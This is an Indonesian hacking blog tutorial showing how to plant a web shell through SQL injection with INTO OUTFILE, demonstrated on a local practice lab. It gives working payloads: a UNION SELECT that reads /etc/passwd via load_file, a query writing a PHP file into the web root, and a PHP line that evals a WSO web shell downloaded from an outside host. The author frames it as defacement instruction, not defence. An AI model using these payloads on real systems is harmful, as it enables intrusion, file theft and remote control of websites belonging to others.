Upload Shell With SQL Injection ( SQL Into OUTFILE)

Admin
Saturday, November 11, 2017

Upload Shell With SQL Injection ( SQL Injection Into OUTFILE)

SQL Injection Into OUTFILE Upload shell tanpa mencari login admin...

sempat" menulis lagi di blog hehehe dari pada bosen gak ngapain" mending buat tutor ... sudah jarang masuk di dunia hacking karena sibuk di dunia nyata...
tapi insyaallah saya akan sempat share tutor ...

*Pastikan kalian sudah mengerti deface sql manual kalo belum lihat post sebelumnya

Deface SQL Manual

ohh ya jika kalian butuh tools" kunjungin juga blog pencari receh :'v

404Hacking

TOols

kali ini saya pakai bts pentesting lab, karena males cari live target

pastikan kalian sudah di posisi seperti ini lalu di angka 3 ganti dengan load_file('/etc/passwd') , localhost:8080/btslab/vulnerability/ForumPosts.php?id=-1 union select 1,2,load_file('/etc/passwd'),4--+
HEX : load_file(0x2f6574632f706173737764)
jika tidak keluar isi dalam perutnya skip aja bro tapi kalau mau tahu isi usernya bisa lihat di target,com/phpinfo.php
karena gw pakai web kaya gini gak bakal keluar lah ya kampang :'v

lalu sekarang untuk mengupload shellnya jika sudah ketemu user langsung go aja keburu kuota gw habis ye
localhost:8080/btslab/vulnerability/ForumPosts.php?id=-1 union select 1,2,'Daffa Haxor',4 into outfile 'D:/USBWebserver v8.6/root/btslab/vulnerability/uploads/daffahaxor.php'--+

kalo seperti berhasil ya fans... sekarang kita coba buka daffahaxor.php &....

sekarang saya pakai teknik memanggil script & kode seperti ini
<?php eval("?>".file_get_contents("http://www.w0rms.com/down/wso.txt"));?>
lalu result seperti ini

terimah kasih sudah melihat tutor jika ada yang bingung tanya ke FB Daffa Haxor klo gak di bales ya lu chat aja ke fanspage :'v

Upload Shell With SQL Injection ( SQL Into OUTFILE)

Upload Shell With SQL Injection ( SQL Injection Into OUTFILE)

Admin 

comment 0 comments

Admin

0 comments